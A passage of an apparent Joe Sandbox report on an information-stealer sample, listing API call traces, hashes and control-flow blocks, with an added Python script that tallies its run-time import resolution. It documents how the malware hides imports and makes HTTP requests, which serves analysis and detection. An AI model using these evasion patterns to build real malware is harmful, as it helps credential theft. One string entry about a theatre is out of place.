                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008E4AD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 2127927946-3329630956
                                  • Opcode ID: 8e69d7020359eff6a88df4a5702e101eb965f10de65de9616fab4be6f77c8d33
                                  • Instruction ID: d5ca50208b36be819637ef61c29e0985d89a19d9e88b3ce8597fea8b5034395a
                                  • Opcode Fuzzy Hash: 8e69d7020359eff6a88df4a5702e101eb965f10de65de9616fab4be6f77c8d33
                                  • Instruction Fuzzy Hash: 0131F6A0F8432C7ED6206FA67C8A9DF7E54DFCC768B704052F51856388C9A06486CEE2

                                  Control-flow Graph

                                  • Graph rendering omitted; basic blocks with API calls: 9063c0-9063ed GetPEB; 9063f3-9065ee call 906320, GetProcAddress * 20; 9065f3-906653 LoadLibraryA * 5; 906655-906663 GetProcAddress; 906671-906697 GetProcAddress * 2; 9066a5-9066b3 GetProcAddress; 9066c1-9066cf GetProcAddress; 9066dd-906702 GetProcAddress * 2; exit 906707-90670a
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,010C37F8), ref: 00906419
                                  • GetProcAddress.KERNEL32(76F70000,010C3828), ref: 00906432
                                  • GetProcAddress.KERNEL32(76F70000,010C38D0), ref: 0090644A
                                  • GetProcAddress.KERNEL32(76F70000,010C3900), ref: 00906462
                                  • GetProcAddress.KERNEL32(76F70000,010C1450), ref: 0090647B
                                  • GetProcAddress.KERNEL32(76F70000,010BABD0), ref: 00906493
                                  • GetProcAddress.KERNEL32(76F70000,010BAD10), ref: 009064AB
                                  • GetProcAddress.KERNEL32(76F70000,010C3978), ref: 009064C4
                                  • GetProcAddress.KERNEL32(76F70000,010C3918), ref: 009064DC
                                  • GetProcAddress.KERNEL32(76F70000,010C3A50), ref: 009064F4
                                  • GetProcAddress.KERNEL32(76F70000,010C3930), ref: 0090650D
                                  • GetProcAddress.KERNEL32(76F70000,010BAD30), ref: 00906525
                                  • GetProcAddress.KERNEL32(76F70000,010C39D8), ref: 0090653D
                                  • GetProcAddress.KERNEL32(76F70000,010C39F0), ref: 00906556
                                  • GetProcAddress.KERNEL32(76F70000,010BADB0), ref: 0090656E
                                  • GetProcAddress.KERNEL32(76F70000,010C3A20), ref: 00906586
                                  • GetProcAddress.KERNEL32(76F70000,010C3A38), ref: 0090659F
                                  • GetProcAddress.KERNEL32(76F70000,010BAB50), ref: 009065B7
                                  • GetProcAddress.KERNEL32(76F70000,010C3B28), ref: 009065CF
                                  • GetProcAddress.KERNEL32(76F70000,010BAEB0), ref: 009065E8
                                  • LoadLibraryA.KERNEL32(010C3B40,?,?,?,00901BE3), ref: 009065F9
                                  • LoadLibraryA.KERNEL32(010C3AE0,?,?,?,00901BE3), ref: 0090660B
                                  • LoadLibraryA.KERNEL32(010C3AF8,?,?,?,00901BE3), ref: 0090661D
                                  • LoadLibraryA.KERNEL32(010C3B10,?,?,?,00901BE3), ref: 0090662E
                                  • LoadLibraryA.KERNEL32(010C3BA0,?,?,?,00901BE3), ref: 00906640
                                  • GetProcAddress.KERNEL32(76DA0000,010C3B70), ref: 0090665D
                                  • GetProcAddress.KERNEL32(75840000,010C3B88), ref: 00906679
                                  • GetProcAddress.KERNEL32(75840000,010C3B58), ref: 00906691
                                  • GetProcAddress.KERNEL32(753A0000,010C2840), ref: 009066AD
                                  • GetProcAddress.KERNEL32(77300000,010BAD50), ref: 009066C9
                                  • GetProcAddress.KERNEL32(774D0000,010C28A0), ref: 009066E5
                                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 009066FC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 009066F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 32d553d284626162254c2f0560797e0ba34624c81e69564bbd0fb9f724df2364
                                  • Instruction ID: 4ba1106f571d152a7ab1dc837b46ca606242ccffbdb3b3b9aa2656d52b95e4c1
                                  • Opcode Fuzzy Hash: 32d553d284626162254c2f0560797e0ba34624c81e69564bbd0fb9f724df2364
                                  • Instruction Fuzzy Hash: 32A14FB5A11280EFD754DF64EDACAA63BB9F78C641380C929E916C3364DF34A901DF60

                                  Control-flow Graph

                                  • Graph rendering omitted; basic blocks with API calls: 8e5570-8e55cf GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA; 8e55d8-8e55f7 InternetReadFile (read loop); 8e5600-8e561d LdrInitializeThunk; 8e5627-8e563d InternetCloseHandle * 2; remaining blocks 8e563f-8e56b1 contain no API calls
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E5589
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008E5590
                                  • InternetOpenA.WININET(0090D014,00000000,00000000,00000000,00000000), ref: 008E55A6
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 008E55C1
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008E55EC
                                  • LdrInitializeThunk.NTDLL(00000000,?,00000001), ref: 008E5611
                                  • InternetCloseHandle.WININET(?), ref: 008E562B
                                  • InternetCloseHandle.WININET(00000000), ref: 008E5632
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileInitializeProcessReadThunk
                                  • String ID:
                                  • API String ID: 1621142662-0
                                  • Opcode ID: 7d924ab8ad9f8eab5da018a747ee4137469d2a88cb09ed65d6f0ac97a8f94886
                                  • Instruction ID: 8f5d54bf73bb7a451029e1a8ead6c4382750dab205e9a9033a5498e0345c1fe2
                                  • Opcode Fuzzy Hash: 7d924ab8ad9f8eab5da018a747ee4137469d2a88cb09ed65d6f0ac97a8f94886
                                  • Instruction Fuzzy Hash: E2417C70A00244AFDB14CF56CC48F9AB7B4FF49708F54C0A9E908DB2A1DB719941CF94

                                  Control-flow Graph

                                  • Graph rendering omitted; basic blocks with API calls: 9028b0-9028f3 GetProcessHeap HeapAlloc RegOpenKeyExA; 9028f5-902905 RegQueryValueExA; 90290b-90291e RegCloseKey; 902920-90292f loop; exit 902931-902934
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009028C5
                                  • HeapAlloc.KERNEL32(00000000), ref: 009028CC
                                  • RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,00902849), ref: 009028EB
                                  • RegQueryValueExA.KERNEL32(00902849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902905
                                  • RegCloseKey.ADVAPI32(00902849), ref: 0090290F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3466090806-1022791448
                                  • Opcode ID: 9f8254e22826c392b06236dcbeba432fca54317f7ae4742e768aeb62f382e8d5
                                  • Instruction ID: b5d6ba2c4ae5df99a1de64cf97f8f43ff7b5bdf2453c783d0b289b292ac6d498
                                  • Opcode Fuzzy Hash: 9f8254e22826c392b06236dcbeba432fca54317f7ae4742e768aeb62f382e8d5
                                  • Instruction Fuzzy Hash: 7B01D475A00258AFE310CBA0DC5DFFB7BBCEB49745F604058FE45D7280EA315A058790
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00902A0F
                                  • HeapAlloc.KERNEL32(00000000), ref: 00902A16
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00902A2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocNameProcessUser
                                  • String ID:
                                  • API String ID: 1206570057-0
                                  • Opcode ID: f441c4103f55a8cc60a48f4db23ef6ffe0e65b6b9150c46087f6289059f7cad6
                                  • Instruction ID: 6e84f151364245c204a84120840d23ba4f97f6c1778d01ac3ace354f7dc506d6
                                  • Opcode Fuzzy Hash: f441c4103f55a8cc60a48f4db23ef6ffe0e65b6b9150c46087f6289059f7cad6
                                  • Instruction Fuzzy Hash: 3BF0B4B1A40244AFC700DF88DD49F9ABBBCF748B21F500226F914E3280D7B4190487E1

Control-flow Graph (basic blocks as "id: address range, calls -> successor blocks"; the executed/not-executed colouring of the rendered graph is not preserved in text)

• 633: 906710-906717 -> 634, 635
• 634: 90671d-906b29, GetProcAddress * 43 -> 635
• 635: 906b2e-906bc2, LoadLibraryA * 8 -> 636, 637
• 636: 906bc4-906c33, GetProcAddress * 5 -> 637
• 637: 906c38-906c3f -> 638, 639
• 638: 906d02-906d09 -> 640, 641
• 639: 906c45-906cfd, GetProcAddress * 8 -> 638
• 640: 906d0b-906d7a, GetProcAddress * 5 -> 641
• 641: 906d7f-906d86 -> 642, 643
• 642: 906e19-906e20 -> 644, 645
• 643: 906d8c-906e14, GetProcAddress * 6 -> 642
• 644: 906f40-906f47 -> 646, 647
• 645: 906e26-906f3b, GetProcAddress * 12 -> 644
• 646: 906f49-906fb8, GetProcAddress * 5 -> 647
• 647: 906fbd-906fc4 -> 648, 649
• 648: 906ff1-906ff8 -> 650, 651
• 649: 906fc6-906fec, GetProcAddress * 2 -> 648
• 650: 907025-90702c -> 652, 653
• 651: 906ffa-907020, GetProcAddress * 2 -> 650
• 652: 907032-907118, GetProcAddress * 10 -> 653
• 653: 90711d-907124 -> 654, 655
• 654: 907182-907189 -> 656, 657
• 655: 907126-90717d, GetProcAddress * 4 -> 654
• 656: 90718b-907199, GetProcAddress -> 657
• 657: 90719e-9071a5 -> 658, 659
• 658: 907203
• 659: 9071a7-9071fe, GetProcAddress * 4 -> 658
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,010C8720), ref: 00906725
                                  • GetProcAddress.KERNEL32(76F70000,010C8520), ref: 0090673D
                                  • GetProcAddress.KERNEL32(76F70000,010C26F0), ref: 00906756
                                  • GetProcAddress.KERNEL32(76F70000,010C27B0), ref: 0090676E
                                  • GetProcAddress.KERNEL32(76F70000,010C2780), ref: 00906786
                                  • GetProcAddress.KERNEL32(76F70000,010C2630), ref: 0090679F
                                  • GetProcAddress.KERNEL32(76F70000,010CBC98), ref: 009067B7
                                  • GetProcAddress.KERNEL32(76F70000,010C26C0), ref: 009067CF
                                  • GetProcAddress.KERNEL32(76F70000,010C26D8), ref: 009067E8
                                  • GetProcAddress.KERNEL32(76F70000,010C2558), ref: 00906800
                                  • GetProcAddress.KERNEL32(76F70000,010C2708), ref: 00906818
                                  • GetProcAddress.KERNEL32(76F70000,010C86E0), ref: 00906831
                                  • GetProcAddress.KERNEL32(76F70000,010C8440), ref: 00906849
                                  • GetProcAddress.KERNEL32(76F70000,010C84C0), ref: 00906861
                                  • GetProcAddress.KERNEL32(76F70000,010C87C0), ref: 0090687A
                                  • GetProcAddress.KERNEL32(76F70000,010C24E0), ref: 00906892
                                  • GetProcAddress.KERNEL32(76F70000,010C24F8), ref: 009068AA
                                  • GetProcAddress.KERNEL32(76F70000,010CBD10), ref: 009068C3
                                  • GetProcAddress.KERNEL32(76F70000,010C8540), ref: 009068DB
                                  • GetProcAddress.KERNEL32(76F70000,010C2528), ref: 009068F3
                                  • GetProcAddress.KERNEL32(76F70000,010C2750), ref: 0090690C
                                  • GetProcAddress.KERNEL32(76F70000,010C2540), ref: 00906924
                                  • GetProcAddress.KERNEL32(76F70000,010C2828), ref: 0090693C
                                  • GetProcAddress.KERNEL32(76F70000,010C8700), ref: 00906955
                                  • GetProcAddress.KERNEL32(76F70000,010CFB50), ref: 0090696D
                                  • GetProcAddress.KERNEL32(76F70000,010CFBC8), ref: 00906985
                                  • GetProcAddress.KERNEL32(76F70000,010CFB08), ref: 0090699E
                                  • GetProcAddress.KERNEL32(76F70000,010CFBE0), ref: 009069B6
                                  • GetProcAddress.KERNEL32(76F70000,010CF9D0), ref: 009069CE
                                  • GetProcAddress.KERNEL32(76F70000,010CFA30), ref: 009069E7
                                  • GetProcAddress.KERNEL32(76F70000,010CFA48), ref: 009069FF
                                  • GetProcAddress.KERNEL32(76F70000,010CF958), ref: 00906A17
                                  • GetProcAddress.KERNEL32(76F70000,010CFBF8), ref: 00906A30
                                  • GetProcAddress.KERNEL32(76F70000,010C4A20), ref: 00906A48
                                  • GetProcAddress.KERNEL32(76F70000,010CFAD8), ref: 00906A60
                                  • GetProcAddress.KERNEL32(76F70000,010CFC28), ref: 00906A79
                                  • GetProcAddress.KERNEL32(76F70000,010C8560), ref: 00906A91
                                  • GetProcAddress.KERNEL32(76F70000,010CFC10), ref: 00906AA9
                                  • GetProcAddress.KERNEL32(76F70000,010C8580), ref: 00906AC2
                                  • GetProcAddress.KERNEL32(76F70000,010CFA60), ref: 00906ADA
                                  • GetProcAddress.KERNEL32(76F70000,010CF970), ref: 00906AF2
                                  • GetProcAddress.KERNEL32(76F70000,010C8360), ref: 00906B0B
                                  • GetProcAddress.KERNEL32(76F70000,010C8120), ref: 00906B23
                                  • LoadLibraryA.KERNEL32(010CFAC0,0090067A), ref: 00906B35
                                  • LoadLibraryA.KERNEL32(010CF988), ref: 00906B46
                                  • LoadLibraryA.KERNEL32(010CFAF0), ref: 00906B58
                                  • LoadLibraryA.KERNEL32(010CF9A0), ref: 00906B6A
                                  • LoadLibraryA.KERNEL32(010CF940), ref: 00906B7B
                                  • LoadLibraryA.KERNEL32(010CFA00), ref: 00906B8D
                                  • LoadLibraryA.KERNEL32(010CFA18), ref: 00906B9F
                                  • LoadLibraryA.KERNEL32(010CFB68), ref: 00906BB0
                                  • GetProcAddress.KERNEL32(75840000,010C8240), ref: 00906BCC
                                  • GetProcAddress.KERNEL32(75840000,010CF9B8), ref: 00906BE4
                                  • GetProcAddress.KERNEL32(75840000,010CD7A8), ref: 00906BFD
                                  • GetProcAddress.KERNEL32(75840000,010CFB20), ref: 00906C15
                                  • GetProcAddress.KERNEL32(75840000,010C8300), ref: 00906C2D
                                  • GetProcAddress.KERNEL32(73AC0000,010CB7C0), ref: 00906C4D
                                  • GetProcAddress.KERNEL32(73AC0000,010C82E0), ref: 00906C65
                                  • GetProcAddress.KERNEL32(73AC0000,010CBB30), ref: 00906C7E
                                  • GetProcAddress.KERNEL32(73AC0000,010CF9E8), ref: 00906C96
                                  • GetProcAddress.KERNEL32(73AC0000,010CFB38), ref: 00906CAE
                                  • GetProcAddress.KERNEL32(73AC0000,010C82A0), ref: 00906CC7
                                  • GetProcAddress.KERNEL32(73AC0000,010C83A0), ref: 00906CDF
                                  • GetProcAddress.KERNEL32(73AC0000,010CFB80), ref: 00906CF7
                                  • GetProcAddress.KERNEL32(760B0000,010C8380), ref: 00906D13
                                  • GetProcAddress.KERNEL32(760B0000,010C80E0), ref: 00906D2B
                                  • GetProcAddress.KERNEL32(760B0000,010CFAA8), ref: 00906D44
                                  • GetProcAddress.KERNEL32(760B0000,010CFA78), ref: 00906D5C
                                  • GetProcAddress.KERNEL32(760B0000,010C83C0), ref: 00906D74
                                  • GetProcAddress.KERNEL32(75D30000,010CBAE0), ref: 00906D94
                                  • GetProcAddress.KERNEL32(75D30000,010CB900), ref: 00906DAC
                                  • GetProcAddress.KERNEL32(75D30000,010CFB98), ref: 00906DC5
                                  • GetProcAddress.KERNEL32(75D30000,010C8140), ref: 00906DDD
                                  • GetProcAddress.KERNEL32(75D30000,010C81C0), ref: 00906DF5
                                  • GetProcAddress.KERNEL32(75D30000,010CB8D8), ref: 00906E0E
                                  • GetProcAddress.KERNEL32(753A0000,010CFA90), ref: 00906E2E
                                  • GetProcAddress.KERNEL32(753A0000,010C8320), ref: 00906E46
                                  • GetProcAddress.KERNEL32(753A0000,010CD818), ref: 00906E5F
                                  • GetProcAddress.KERNEL32(753A0000,010CFBB0), ref: 00906E77
                                  • GetProcAddress.KERNEL32(753A0000,010CFD00), ref: 00906E8F
                                  • GetProcAddress.KERNEL32(753A0000,010C8340), ref: 00906EA8
                                  • GetProcAddress.KERNEL32(753A0000,010C8100), ref: 00906EC0
                                  • GetProcAddress.KERNEL32(753A0000,010CFC58), ref: 00906ED8
                                  • GetProcAddress.KERNEL32(753A0000,010CFC70), ref: 00906EF1
                                  • GetProcAddress.KERNEL32(753A0000,CreateDesktopA), ref: 00906F07
                                  • GetProcAddress.KERNEL32(753A0000,OpenDesktopA), ref: 00906F1E
                                  • GetProcAddress.KERNEL32(753A0000,CloseDesktop), ref: 00906F35
                                  • GetProcAddress.KERNEL32(76DA0000,010C8060), ref: 00906F51
                                  • GetProcAddress.KERNEL32(76DA0000,010CFC88), ref: 00906F69
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCD0), ref: 00906F82
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCA0), ref: 00906F9A
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCB8), ref: 00906FB2
                                  • GetProcAddress.KERNEL32(77300000,010C83E0), ref: 00906FCE
                                  • GetProcAddress.KERNEL32(77300000,010C8400), ref: 00906FE6
                                  • GetProcAddress.KERNEL32(767E0000,010C8220), ref: 00907002
                                  • GetProcAddress.KERNEL32(767E0000,010CFCE8), ref: 0090701A
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8080), ref: 0090703A
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8160), ref: 00907052
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8280), ref: 0090706B
                                  • GetProcAddress.KERNEL32(6F6A0000,010CFC40), ref: 00907083
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8020), ref: 0090709B
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8260), ref: 009070B4
                                  • GetProcAddress.KERNEL32(6F6A0000,010C80A0), ref: 009070CC
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8040), ref: 009070E4
                                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 009070FB
                                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00907112
                                  • GetProcAddress.KERNEL32(75760000,010D0468), ref: 0090712E
                                  • GetProcAddress.KERNEL32(75760000,010CD798), ref: 00907146
                                  • GetProcAddress.KERNEL32(75760000,010D0378), ref: 0090715F
                                  • GetProcAddress.KERNEL32(75760000,010D0390), ref: 00907177
                                  • GetProcAddress.KERNEL32(762C0000,010C80C0), ref: 00907193
                                  • GetProcAddress.KERNEL32(6E970000,010D0438), ref: 009071AF
                                  • GetProcAddress.KERNEL32(6E970000,010C82C0), ref: 009071C7
                                  • GetProcAddress.KERNEL32(6E970000,010D0408), ref: 009071E0
                                  • GetProcAddress.KERNEL32(6E970000,010D0360), ref: 009071F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 4449d67393b3fde9ea2cfefc17b72c275dfd85b5bc3e8f15492f9d96918c46dc
                                  • Instruction ID: 90f980248ab42137f00ce7fa5c91668f8e1ec48d0c000a53a90716440d6dd179
                                  • Opcode Fuzzy Hash: 4449d67393b3fde9ea2cfefc17b72c275dfd85b5bc3e8f15492f9d96918c46dc
                                  • Instruction Fuzzy Hash: D3623EB5A10280EFD754DF64ECACAE637BAF78C641390C929E956C3364DF34A841DB60
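The function above resolves its imports at run time: 107 GetProcAddress calls against 13 module handles, with the 8 LoadLibraryA calls sitting after the first block of 43 resolutions (so that first module was already mapped). Only five export names appear in plaintext (CreateDesktopA, OpenDesktopA, CloseDesktop, which are user32.dll exports, and InternetSetOptionA, HttpQueryInfoA, which are wininet.dll exports); the other 102 name arguments are pointers into the 0x010Cxxxx-0x010Dxxxx range, outside the image mapped at 0x8E0000, which fits the "Sample uses string decryption" and "Extensive use of GetProcAddress" signatures. Each group of resolutions is guarded by a short check block that can skip it. The Python script below is an added example, not part of the Joe Sandbox report: it parses API lines in the report's own format and summarises the resolution pattern. The embedded trace is a constructed subset of the lines above, and the image upper bound IMAGE_HI is an assumption (the report lists segment start addresses up to 0xB2A000 but not their sizes).

```python
import re
from collections import Counter

# Constructed input: a subset of the API lines from the function above, copied
# in the report's own format. The full function makes 107 GetProcAddress and
# 8 LoadLibraryA calls.
TRACE = """
GetProcAddress.KERNEL32(76F70000,010C8720), ref: 00906725
GetProcAddress.KERNEL32(76F70000,010C8520), ref: 0090673D
LoadLibraryA.KERNEL32(010CFAC0,0090067A), ref: 00906B35
LoadLibraryA.KERNEL32(010CF988), ref: 00906B46
GetProcAddress.KERNEL32(75840000,010C8240), ref: 00906BCC
GetProcAddress.KERNEL32(753A0000,010CFA90), ref: 00906E2E
GetProcAddress.KERNEL32(753A0000,CreateDesktopA), ref: 00906F07
GetProcAddress.KERNEL32(753A0000,OpenDesktopA), ref: 00906F1E
GetProcAddress.KERNEL32(753A0000,CloseDesktop), ref: 00906F35
GetProcAddress.KERNEL32(6F6A0000,010C8080), ref: 0090703A
GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 009070FB
GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00907112
GetProcAddress.KERNEL32(6E970000,010D0438), ref: 009071AF
"""

# Image range from the "Memory Dump Source" entries: base 0x8E0000, last listed
# segment at 0xB2A000. IMAGE_HI is an assumption (segment sizes are not in the
# report); it only has to separate the image from the 0x010Cxxxx buffers.
IMAGE_LO = 0x008E0000
IMAGE_HI = 0x00C00000

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")


def parse_trace(text):
    """Turn report lines into dicts; lines that do not match are skipped."""
    calls = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if m is None:
            continue
        calls.append({
            "api": m["api"],
            "dll": m["dll"],
            "args": m["args"].split(","),
            "ref": int(m["ref"], 16),
        })
    return calls


def classify_name_arg(arg):
    """Classify the lpProcName argument of GetProcAddress.

    'literal' - the sandbox resolved a plaintext export name
    'image'   - a pointer into the mapped PE (name stored in the binary)
    'outside' - a pointer outside the image (heap or decrypted buffer)
    """
    if not HEX_RE.match(arg):
        return "literal"
    addr = int(arg, 16) & 0xFFFFFFFF
    return "image" if IMAGE_LO <= addr < IMAGE_HI else "outside"


def summarize_resolution(calls):
    """Count dynamic resolutions per module handle and by name-argument kind."""
    per_module = Counter()
    kinds = Counter()
    literals = []
    loads = 0
    for call in calls:
        if call["api"] == "LoadLibraryA":
            loads += 1
        elif call["api"] == "GetProcAddress":
            module, name = call["args"][0], call["args"][1]
            per_module[module] += 1
            kind = classify_name_arg(name)
            kinds[kind] += 1
            if kind == "literal":
                literals.append(name)
    return {
        "loadlibrary_calls": loads,
        "getprocaddress_calls": sum(per_module.values()),
        "per_module": dict(per_module),
        "name_kinds": dict(kinds),
        "literal_names": literals,
    }


if __name__ == "__main__":
    for key, value in summarize_resolution(parse_trace(TRACE)).items():
        print(f"{key}: {value}")
```

Run against the full 115-line API list rather than the subset, the per-module counts reproduce the GetProcAddress groups of the control-flow graph (43, 5, 8, 5, 6, 12, 5, 2, 2, 10, 4, 1, 4), and name_kinds separates the five plaintext exports from the 102 decrypted names.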
                                  APIs
                                  • lstrlenA.KERNEL32(0090D014,00000001,00000000,00000000), ref: 008FF32E
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF34C
                                  • lstrlenA.KERNEL32(0090D014), ref: 008FF357
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF371
                                  • lstrlenA.KERNEL32(0090D014), ref: 008FF37C
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF396
                                  • lstrcpy.KERNEL32(00000000,00915558), ref: 008FF3BE
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF3EC
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF422
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF454
                                  • lstrlenA.KERNEL32(010C8460), ref: 008FF476
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF506
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF52B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF5E2
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF894
                                  • lstrlenA.KERNEL32(010CD8D8), ref: 008FF8C2
                                  • lstrcpy.KERNEL32(00000000,010CD8D8), ref: 008FF8EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF912
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF966
                                  • lstrcpy.KERNEL32(00000000,010CD8D8), ref: 008FFA28
                                  • lstrcpy.KERNEL32(00000000,010CD7E8), ref: 008FFA58
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FFAB7
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FFBD5
                                  • lstrlenA.KERNEL32(010CD808), ref: 008FFC03
                                  • lstrcpy.KERNEL32(00000000,010CD808), ref: 008FFC30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FFC53
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FFCA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 8ec94abf2cb9464e88a49bb7c7e465fe13034809f01de14de82acdcab645db0e
                                  • Instruction ID: c4694487afe43269e88044f9ba16159ad5ccd3552a5b75b185e7e7b6edb49739
                                  • Opcode Fuzzy Hash: 8ec94abf2cb9464e88a49bb7c7e465fe13034809f01de14de82acdcab645db0e
                                  • Instruction Fuzzy Hash: 0FA239309012469FC724DF39C848A6ABBE8FF85714F588579EA49DB3A2DB31DC41CB91

Control-flow Graph (basic blocks as "id: address range, calls -> successor blocks"; the executed/not-executed colouring of the rendered graph is not preserved in text)

• 1889: 8e6b80-8e6ba4, call 8e2840 -> 1892, 1893
• 1892: 8e6ba6-8e6bab -> 1893, 1894
• 1893: 8e6bb5-8e6bd7, call 8e4ae0 -> 1897, 1898
• 1894: 8e6bad-8e6baf, lstrcpy -> 1893
• 1897: 8e6bea-8e6bfa, call 8e2840 -> 1902, 1903
• 1898: 8e6bd9 -> 1899
• 1899: 8e6be0-8e6be8 -> 1897, 1899
• 1902: 8e6bfc-8e6c02, lstrcpy -> 1903
• 1903: 8e6c08-8e6c35, InternetOpenA StrCmpCA -> 1904, 1905
• 1904: 8e6c3a-8e6c3c -> 1906, 1907
• 1905: 8e6c37 -> 1904
• 1906: 8e6de8-8e6dfb, call 8e2840 -> 1916, 1917
• 1907: 8e6c42-8e6c62, InternetConnectA -> 1908, 1909
• 1908: 8e6c68-8e6c9d, HttpOpenRequestA -> 1911, 1912
• 1909: 8e6de1-8e6de2, InternetCloseHandle -> 1906
• 1911: 8e6dd4-8e6dde, InternetCloseHandle -> 1909
• 1912: 8e6ca3-8e6ca5 -> 1914, 1915
• 1914: 8e6cbd-8e6ced, HttpSendRequestA HttpQueryInfoA -> 1918, 1919
• 1915: 8e6ca7-8e6cb7, InternetSetOptionA -> 1914
• 1916: 8e6dfd-8e6dff -> 1917, 1920
• 1917: 8e6e09-8e6e20, call 8e2930 * 2
• 1918: 8e6cef-8e6d13, call 907210, call 8e2930 * 2
• 1919: 8e6d14-8e6d24, call 903d30 -> 1918, 1928
• 1920: 8e6e01-8e6e03, lstrcpy -> 1917
• 1928: 8e6d26-8e6d28 -> 1931, 1932
• 1931: 8e6d2e-8e6d47, InternetReadFile -> 1932, 1934
• 1932: 8e6dcd-8e6dce, InternetCloseHandle -> 1911
